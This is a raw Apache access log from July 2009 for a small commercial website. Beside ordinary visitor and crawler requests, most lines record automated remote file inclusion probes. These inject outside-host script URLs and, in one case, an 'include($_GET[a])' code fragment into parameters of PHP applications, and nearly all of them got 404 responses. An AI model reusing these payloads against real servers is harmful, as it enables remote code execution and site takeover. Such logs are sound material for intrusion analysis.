93.172.129.118 - - [26/Jul/2009:03:06:15 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:15 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:16 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:16 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
74.205.123.49 - - [26/Jul/2009:03:08:56 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.205.123.49 - - [26/Jul/2009:03:08:56 -0400] "GET //include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.149.157.130 - - [26/Jul/2009:03:08:58 -0400] "GET /logs/errors.php?error=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:03:08:58 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.168.170.105 - - [26/Jul/2009:03:08:59 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
95.168.170.105 - - [26/Jul/2009:03:08:59 -0400] "GET //include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.205.123.49 - - [26/Jul/2009:03:09:07 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
74.205.123.49 - - [26/Jul/2009:03:09:07 -0400] "GET //include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
74.205.123.49 - - [26/Jul/2009:03:09:07 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
66.249.68.247 - - [26/Jul/2009:03:09:08 -0400] "GET /images/_notes/nav_store_search_name2.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.168.170.105 - - [26/Jul/2009:03:09:11 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:03:09:11 -0400] "GET //include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:03:09:11 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
91.149.157.130 - - [26/Jul/2009:03:09:12 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:03:09:55 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:03:10:00 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:10:16 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L2012EF366E907300E520037+WSEQ(S0060):1+OUITEM(A0200):20155411 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:03:10:41 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.205.123.49 - - [26/Jul/2009:03:10:41 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.20.186.139 - - [26/Jul/2009:03:10:41 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:10:41 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:03:10:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.205.123.49 - - [26/Jul/2009:03:10:44 -0400] "GET //include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:03:10:48 -0400] "GET //include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:03:11:06 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.29.159.130 - - [26/Jul/2009:03:11:08 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
217.29.159.130 - - [26/Jul/2009:03:11:08 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
74.205.123.49 - - [26/Jul/2009:03:11:44 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
95.168.170.105 - - [26/Jul/2009:03:12:23 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
70.181.192.208 - - [26/Jul/2009:03:13:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
70.181.192.208 - - [26/Jul/2009:03:13:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
70.181.192.208 - - [26/Jul/2009:03:13:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
70.181.192.208 - - [26/Jul/2009:03:13:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
87.20.186.139 - - [26/Jul/2009:03:13:32 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:13:33 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:03:13:34 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:03:13:34 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:03:13:35 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:03:13:44 -0400] "GET /logs/access_log.Q109051300//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:13:44 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:13:44 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:13:44 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:13:52 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.136.251 - - [26/Jul/2009:03:14:00 -0400] "GET /logs/access_log.Q109070200//include/mail.inc.php?skin_board_path=http://www.culturalclassics.com//components/com_virtuemart/cmss/baner.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:14:01 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:14:01 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:03:15:07 -0400] "GET /logs/error_log.Q109050600//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
91.149.157.130 - - [26/Jul/2009:03:15:07 -0400] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
91.149.157.130 - - [26/Jul/2009:03:15:07 -0400] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Jul/2009:03:15:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:03:15:43 -0400] "GET /images/_notes/circle_CD_video.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:03:16:30 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:16:44 -0400] "GET //modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:16:44 -0400] "GET /logs//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:16:44 -0400] "GET /logs/access_log.Q109051500//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:03:17:14 -0400] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:03:17:14 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:03:17:27 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:03:18:21 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:03:18:27 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:18:54 -0400] "GET /logs/access_log.Q109062100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:18:54 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:18:54 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:03:19:01 -0400] "GET /logs/access_log.Q109051200%20%20/port.php?content=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:03:19:01 -0400] "GET /logs/access_log.Q109060600%20%20/port.php?content=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:19:09 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:19:09 -0400] "GET /logs/access_log.Q109062100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:19:10 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:19:11 -0400] "GET /logs/access_log.Q109062100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:19:28 -0400] "GET /logs/access_log.Q109062100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
82.195.150.228 - - [26/Jul/2009:03:19:38 -0400] "GET /logs/access_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
82.195.150.228 - - [26/Jul/2009:03:19:38 -0400] "GET /article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
82.195.150.228 - - [26/Jul/2009:03:19:38 -0400] "GET /logs/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
87.20.186.139 - - [26/Jul/2009:03:20:26 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:03:20:27 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:20:34 -0400] "GET /logs/access_log.Q109051500%20%20//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:20:34 -0400] "GET /logs//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:20:36 -0400] "GET //modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:03:20:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.0" 200 56584 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Jul/2009:03:20:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [26/Jul/2009:03:21:11 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:21:11 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:21:12 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:21:30 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:21:30 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:21:30 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:21:30 -0400] "GET /logs/access_log.Q109062100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:21:34 -0400] "GET //modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:21:34 -0400] "GET /logs//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:21:36 -0400] "GET /logs/access_log.Q109051500%20%20//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:21:49 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:21:50 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:21:50 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:03:22:18 -0400] "GET /images/_notes/download_cat_BBF04.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.248.88.155 - - [26/Jul/2009:03:22:27 -0400] "GET //modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:22:27 -0400] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:22:27 -0400] "GET /logs/access_log.Q109063000//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:22:32 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:22:36 -0400] "GET /?sourcedir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:22:36 -0400] "GET /logs/?sourcedir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 200 11066 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:22:36 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:03:22:48 -0400] "GET /logs/access_log.Q109061100//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:04 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:04 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:04 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:18 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:03:23:26 -0400] "GET /logs/access_log.Q109070100//modules/mods_full/shopping_cart/includes/errors.php?error=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:23:28 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:31 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:31 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
212.97.132.151 - - [26/Jul/2009:03:23:31 -0400] "GET /logs/access_log.Q109063000%20%20/akocomments.php?mosConfig_absolute_path=http://rdmf.altervista.org/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:23:31 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:23:33 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
